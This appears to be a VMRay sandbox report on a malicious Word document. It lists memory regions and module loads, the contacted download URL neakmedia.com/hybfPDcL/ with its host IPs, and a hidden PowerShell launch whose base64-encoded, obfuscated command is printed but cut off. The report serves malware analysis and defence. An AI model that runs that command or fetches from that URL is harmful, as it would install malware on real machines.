Persistent Malware | Grouped Behavior
Try VMRay Analyzer
URL Overview
Remarks
Critical The sample contacted only unknown URLs.
URL (1)
+
URL Connection Successful Reputation Status
neakmedia.com/hybfPDcL/ True
Unknown
Involved Hosts

Hostname IP Addresses Country City Protocols Has Blacklisted URL
neakmedia.com 70.39.145.109 US Los Angeles HTTP, DNS, TCP False
74.208.155.175 US Wayne TCP False
167.114.121.80 CA Montral TCP False
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 314, Network: 0)
+
Information Value
ID #1
File Name c:\program files\microsoft office\office15\winword.exe
Command Line "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:10, Reason: Analysis Target
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:02:15
OS Process Information
+
Information Value
PID 0x9c4
Parent PID 0x618 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A08
0x A04
0x A00
0x 9FC
0x 9F8
0x 9F4
0x 9E0
0x 9DC
0x 9D4
0x 9D0
0x 9C8
0x A48
0x A64
0x A98
0x B44
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable False False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000140000 0x00140000 0x00143fff Pagefile Backed Memory Readable False False False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable False False False
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable False False False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable False False False
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory Readable, Writable False False False
private_0x0000000000330000 0x00330000 0x00360fff Private Memory Readable, Writable False False False
private_0x0000000000370000 0x00370000 0x00379fff Private Memory Readable, Writable, Executable False False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory False False False
pagefile_0x0000000000390000 0x00390000 0x00396fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000003a0000 0x003a0000 0x003a1fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000003b0000 0x003b0000 0x003b0fff Private Memory Readable, Writable False False False
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable False False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable False False False
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable False False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable False False False
pagefile_0x0000000000400000 0x00400000 0x004c7fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000004d0000 0x004d0000 0x005d0fff Pagefile Backed Memory Readable False False False
private_0x00000000005e0000 0x005e0000 0x005e0fff Private Memory Readable, Writable False False False
private_0x00000000005f0000 0x005f0000 0x005f0fff Private Memory Readable, Writable False False False
private_0x0000000000600000 0x00600000 0x00600fff Private Memory Readable, Writable False False False
private_0x0000000000610000 0x00610000 0x0062ffff Private Memory Readable, Writable False False False
private_0x0000000000630000 0x00630000 0x0063ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000640000 0x00640000 0x0071efff Pagefile Backed Memory Readable False False False
private_0x0000000000720000 0x00720000 0x00720fff Private Memory Readable, Writable False False False
private_0x0000000000730000 0x00730000 0x00730fff Private Memory Readable, Writable False False False
private_0x0000000000740000 0x00740000 0x00740fff Private Memory Readable, Writable False False False
private_0x0000000000750000 0x00750000 0x00750fff Private Memory Readable, Writable False False False
private_0x0000000000760000 0x00760000 0x00760fff Private Memory Readable, Writable False False False
private_0x0000000000770000 0x00770000 0x00770fff Private Memory Readable, Writable False False False
private_0x0000000000780000 0x00780000 0x00780fff Private Memory Readable, Writable False False False
private_0x0000000000790000 0x00790000 0x00790fff Private Memory Readable, Writable False False False
private_0x00000000007a0000 0x007a0000 0x007a0fff Private Memory Readable, Writable False False False
private_0x00000000007b0000 0x007b0000 0x007b0fff Private Memory Readable, Writable False False False
pagefile_0x00000000007c0000 0x007c0000 0x007c0fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000007d0000 0x007d0000 0x007d0fff Private Memory Readable, Writable False False False
private_0x00000000007e0000 0x007e0000 0x0081ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000820000 0x00820000 0x00820fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000830000 0x00830000 0x00833fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000840000 0x00840000 0x00840fff Private Memory Readable, Writable False False False
private_0x0000000000850000 0x00850000 0x0085ffff Private Memory Readable, Writable False False False
private_0x0000000000860000 0x00860000 0x0095ffff Private Memory Readable, Writable False False False
private_0x0000000000960000 0x00960000 0x00a5ffff Private Memory Readable, Writable False False False
private_0x0000000000a60000 0x00a60000 0x00a60fff Private Memory Readable, Writable False False False
pagefile_0x0000000000a70000 0x00a70000 0x00a71fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000a80000 0x00a80000 0x00a80fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000a90000 0x00a90000 0x00a90fff Pagefile Backed Memory Readable False False False
msxml6r.dll 0x00aa0000 0x00aa0fff Memory Mapped File Readable False False False
private_0x0000000000ab0000 0x00ab0000 0x00abffff Private Memory Readable, Writable False False False
private_0x0000000000ac0000 0x00ac0000 0x00bbffff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x00bc0000 0x00be5fff Memory Mapped File Readable False False False
pagefile_0x0000000000bf0000 0x00bf0000 0x00bf0fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000c00000 0x00c00000 0x00c00fff Private Memory Readable, Writable False False False
winword.exe 0x00c10000 0x00de6fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000df0000 0x00df0000 0x019effff Pagefile Backed Memory Readable False False False
pagefile_0x00000000019f0000 0x019f0000 0x01de2fff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False
private_0x00000000020c0000 0x020c0000 0x0213ffff Private Memory Readable, Writable False False False
c_1255.nls 0x02140000 0x02150fff Memory Mapped File Readable False False False
private_0x0000000002160000 0x02160000 0x02160fff Private Memory Readable, Writable False False False
private_0x0000000002170000 0x02170000 0x02170fff Private Memory Readable, Writable False False False
private_0x0000000002180000 0x02180000 0x0227ffff Private Memory Readable, Writable False False False
private_0x0000000002280000 0x02280000 0x02280fff Private Memory Readable, Writable False False False
private_0x0000000002290000 0x02290000 0x02290fff Private Memory Readable, Writable False False False
private_0x00000000022a0000 0x022a0000 0x022a0fff Private Memory Readable, Writable False False False
private_0x00000000022b0000 0x022b0000 0x022b0fff Private Memory Readable, Writable False False False
private_0x00000000022c0000 0x022c0000 0x022c0fff Private Memory Readable, Writable False False False
private_0x00000000022d0000 0x022d0000 0x022d0fff Private Memory Readable, Writable False False False
private_0x00000000022e0000 0x022e0000 0x022e0fff Private Memory Readable, Writable False False False
private_0x00000000022f0000 0x022f0000 0x022f0fff Private Memory Readable, Writable False False False
private_0x0000000002300000 0x02300000 0x02300fff Private Memory Readable, Writable False False False
private_0x0000000002310000 0x02310000 0x02310fff Private Memory Readable, Writable False False False
private_0x0000000002320000 0x02320000 0x02320fff Private Memory Readable, Writable False False False
private_0x0000000002330000 0x02330000 0x02330fff Private Memory Readable, Writable False False False
private_0x0000000002340000 0x02340000 0x02340fff Private Memory Readable, Writable False False False
private_0x0000000002350000 0x02350000 0x02350fff Private Memory Readable, Writable False False False
private_0x0000000002360000 0x02360000 0x02360fff Private Memory Readable, Writable False False False
private_0x0000000002370000 0x02370000 0x02370fff Private Memory Readable, Writable False False False
private_0x0000000002380000 0x02380000 0x0239efff Private Memory Readable, Writable False False False
private_0x00000000023a0000 0x023a0000 0x0249ffff Private Memory Readable, Writable False False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable False False False
private_0x00000000025a0000 0x025a0000 0x025a0fff Private Memory Readable, Writable False False False
private_0x00000000025b0000 0x025b0000 0x025b0fff Private Memory Readable, Writable False False False
private_0x00000000025c0000 0x025c0000 0x025c0fff Private Memory Readable, Writable False False False
pagefile_0x00000000025d0000 0x025d0000 0x025d1fff Pagefile Backed Memory Readable False False False
segoeui.ttf 0x026e0000 0x0275efff Memory Mapped File Readable False False False
private_0x0000000002770000 0x02770000 0x027affff Private Memory Readable, Writable False False False
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable False False False
private_0x00000000028e0000 0x028e0000 0x028effff Private Memory Readable, Writable False False False
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable False False False
pagefile_0x0000000002a00000 0x02a00000 0x02dfffff Pagefile Backed Memory Readable False False False
staticcache.dat 0x02e00000 0x0372ffff Memory Mapped File Readable False False False
private_0x0000000003760000 0x03760000 0x0385ffff Private Memory Readable, Writable False False False
private_0x0000000003860000 0x03860000 0x0389ffff Private Memory Readable, Writable, Executable False False False
private_0x00000000038a0000 0x038a0000 0x0399ffff Private Memory Readable, Writable False False False
seguisb.ttf 0x039a0000 0x03a03fff Memory Mapped File Readable False False False
private_0x0000000003a10000 0x03a10000 0x03a4ffff Private Memory Readable, Writable, Executable False False False
private_0x0000000003ad0000 0x03ad0000 0x03b0ffff Private Memory Readable, Writable False False False
private_0x0000000003b70000 0x03b70000 0x03baffff Private Memory Readable, Writable False False False
private_0x0000000003bd0000 0x03bd0000 0x03bdffff Private Memory Readable, Writable False False False
pagefile_0x0000000003be0000 0x03be0000 0x043dffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000004410000 0x04410000 0x0450ffff Private Memory Readable, Writable False False False
private_0x0000000004560000 0x04560000 0x0465ffff Private Memory Readable, Writable False False False
private_0x0000000004700000 0x04700000 0x0473ffff Private Memory Readable, Writable False False False
private_0x00000000047b0000 0x047b0000 0x048affff Private Memory Readable, Writable False False False
pagefile_0x00000000048b0000 0x048b0000 0x04caffff Pagefile Backed Memory Readable, Writable False False False
kernelbase.dll.mui 0x04cb0000 0x04d6ffff Memory Mapped File Readable, Writable False False False
private_0x0000000004d70000 0x04d70000 0x0516ffff Private Memory Readable, Writable False False False
private_0x0000000005170000 0x05170000 0x0536ffff Private Memory Readable, Writable False False False
private_0x0000000005420000 0x05420000 0x0581ffff Private Memory Readable, Writable False False False
pagefile_0x0000000005820000 0x05820000 0x0601ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006020000 0x06020000 0x06420fff Private Memory Readable, Writable False False False
private_0x0000000006430000 0x06430000 0x06830fff Private Memory Readable, Writable False False False
private_0x0000000006840000 0x06840000 0x06c40fff Private Memory Readable, Writable False False False
private_0x0000000006c50000 0x06c50000 0x06e4ffff Private Memory Readable, Writable False False False
private_0x0000000006e50000 0x06e50000 0x0730ffff Private Memory Readable, Writable False False False
private_0x0000000007310000 0x07310000 0x0770ffff Private Memory Readable, Writable False False False
private_0x0000000007710000 0x07710000 0x07f0ffff Private Memory Readable, Writable False False False
private_0x0000000036890000 0x36890000 0x3689ffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x63b00000 0x63b2cfff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x63b30000 0x63cbdfff Memory Mapped File Readable, Writable, Executable False False False
adal.dll 0x63cc0000 0x63d74fff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x63d80000 0x63df9fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x63ed0000 0x63fd9fff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x63fe0000 0x6410bfff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x64110000 0x68dfafff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x68e00000 0x6a6e3fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x6a6f0000 0x6bbabfff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x6bbc0000 0x6bc09fff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x6bc10000 0x6bc92fff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x6bca0000 0x6bdb5fff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x6bdc0000 0x6c130fff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x6c140000 0x6c1fffff Memory Mapped File Readable, Writable, Executable False False False
d2d1.dll 0x6c200000 0x6c2b9fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x6c2c0000 0x6d067fff Memory Mapped File Readable, Writable, Executable False False False
msohev.dll 0x6ed70000 0x6ed84fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x6f5b0000 0x6f600fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x6fa80000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable False False False
office.odf 0x70ac0000 0x70fbffff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x71230000 0x71298fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x712a0000 0x7135efff Memory Mapped File Readable, Writable, Executable False False False
For performance reasons, the remaining 194 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU os_pid = 0xa68, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (62)
+
Operation Module Additional Information Success Count Logfile
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x6d220000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x76ba0000 True 1
Fn
Load VBE7.DLL base_address = 0x720d0000 True 1
Fn
Get Handle c:\program files\microsoft office\office15\winword.exe base_address = 0xc10000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Filename process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 True 2
Fn
Get Address Unknown module name function = _MsoVBADigSigCallDlg@20, address_out = 0x6d34fe80 True 1
Fn
Get Address Unknown module name function = _MsoVbaInitSecurity@4, address_out = 0x6d2d8951 True 1
Fn
Get Address Unknown module name function = _MsoFIEPolicyAndVersion@8, address_out = 0x6d2ccd31 True 1
Fn
Get Address Unknown module name function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6d2d882e True 1
Fn
Get Address Unknown module name function = _MsoFInitOffice@20, address_out = 0x6d2ccd4b True 1
Fn
Get Address Unknown module name function = _MsoUninitOffice@4, address_out = 0x6d2896db True 1
Fn
Get Address Unknown module name function = _MsoFGetFontSettings@20, address_out = 0x6d281af9 True 1
Fn
Get Address Unknown module name function = _MsoRgchToRgwch@16, address_out = 0x6d289bae True 1
Fn
Get Address Unknown module name function = _MsoHrSimpleQueryInterface@16, address_out = 0x6d2834e1 True 1
Fn
Get Address Unknown module name function = _MsoHrSimpleQueryInterface2@20, address_out = 0x6d283523 True 1
Fn
Get Address Unknown module name function = _MsoFCreateControl@36, address_out = 0x6d284a26 True 1
Fn
Get Address Unknown module name function = _MsoFLongLoad@8, address_out = 0x6d381250 True 1
Fn
Get Address Unknown module name function = _MsoFLongSave@8, address_out = 0x6d381259 True 1
Fn
Get Address Unknown module name function = _MsoFGetTooltips@0, address_out = 0x6d2bdfac True 1
Fn
Get Address Unknown module name function = _MsoFSetTooltips@4, address_out = 0x6d2e2845 True 1
Fn
Get Address Unknown module name function = _MsoFLoadToolbarSet@24, address_out = 0x6d2cdd8b True 1
Fn
Get Address Unknown module name function = _MsoFCreateToolbarSet@28, address_out = 0x6d2823c9 True 1
Fn
Get Address Unknown module name function = _MsoHpalOffice@0, address_out = 0x6d28c568 True 1
Fn
Get Address Unknown module name function = _MsoFWndProcNeeded@4, address_out = 0x6d2818d2 True 1
Fn
Get Address Unknown module name function = _MsoFWndProc@24, address_out = 0x6d282a70 True 1
Fn
Get Address Unknown module name function = _MsoFCreateITFCHwnd@20, address_out = 0x6d281925 True 1
Fn
Get Address Unknown module name function = _MsoDestroyITFC@4, address_out = 0x6d28958b True 1
Fn
Get Address Unknown module name function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x6d288820 True 1
Fn
Get Address Unknown module name function = _MsoFGetComponentManager@4, address_out = 0x6d2835a4 True 1
Fn
Get Address Unknown module name function = _MsoMultiByteToWideChar@24, address_out = 0x6d28ac03 True 2
Fn
Get Address Unknown module name function = _MsoWideCharToMultiByte@32, address_out = 0x6d284d33 True 1
Fn
Get Address Unknown module name function = _MsoHrRegisterAll@0, address_out = 0x6d34f8b6 True 1
Fn
Get Address Unknown module name function = _MsoFSetComponentManager@4, address_out = 0x6d28c179 True 1
Fn
Get Address Unknown module name function = _MsoFCreateStdComponentManager@20, address_out = 0x6d2819d5 True 1
Fn
Get Address Unknown module name function = _MsoFHandledMessageNeeded@4, address_out = 0x6d286736 True 1
Fn
Get Address Unknown module name function = _MsoPeekMessage@8, address_out = 0x6d28649f True 1
Fn
Get Address Unknown module name function = _MsoFCreateIPref@28, address_out = 0x6d27f9cf True 1
Fn
Get Address Unknown module name function = _MsoDestroyIPref@4, address_out = 0x6d289320 True 1
Fn
Get Address Unknown module name function = _MsoChsFromLid@4, address_out = 0x6d27f864 True 1
Fn
Get Address Unknown module name function = _MsoCpgFromChs@4, address_out = 0x6d281cc5 True 1
Fn
Get Address Unknown module name function = _MsoSetLocale@4, address_out = 0x6d27f984 True 1
Fn
Get Address Unknown module name function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6d28198e True 1
Fn
Get Address Unknown module name function = _MsoSetVbaInterfaces@8, address_out = 0x6d34ff8d True 1
Fn
Get Address Unknown module name function = _MsoGetControlInstanceId@8, address_out = 0x6d3286e7 True 1
Fn
Get Address Unknown module name function = SysFreeString, address_out = 0x76ba3e59 True 1
Fn
Get Address Unknown module name function = LoadTypeLib, address_out = 0x76bb0aa2 True 1
Fn
Get Address Unknown module name function = RegisterTypeLib, address_out = 0x76bc1ea6 True 1
Fn
Get Address Unknown module name function = QueryPathOfRegTypeLib, address_out = 0x76bd351b True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x76bd1ca9 True 1
Fn
Get Address Unknown module name function = OleTranslateColor, address_out = 0x76bd26fa True 1
Fn
Get Address Unknown module name function = OleCreateFontIndirect, address_out = 0x76bc352f True 1
Fn
Get Address Unknown module name function = OleCreatePictureIndirect, address_out = 0x76bc3df8 True 1
Fn
